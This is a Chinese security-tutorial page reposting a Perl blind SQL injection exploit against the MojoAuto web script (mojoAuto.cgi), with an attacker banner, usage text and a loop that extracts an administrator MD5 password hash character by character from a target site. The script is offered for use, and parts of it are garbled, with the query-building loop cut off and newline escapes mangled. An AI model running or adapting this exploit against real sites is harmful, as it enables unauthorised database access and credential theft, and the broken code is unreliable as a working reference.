手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoAuto Blind SQL Injection Exploit #n";

print " # (mojoAuto.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat_a value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_a = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit】相关文章:

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

入侵防护系统IPS怎么选择

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

adsafe不能拦截广告怎么办?

高招 Windows 7下不让病毒执行的方法

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

最快的互联网扫描工具ZMap 1.2.1版使用手册

在局域网上把自己隐藏起来

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

精品推荐
分类导航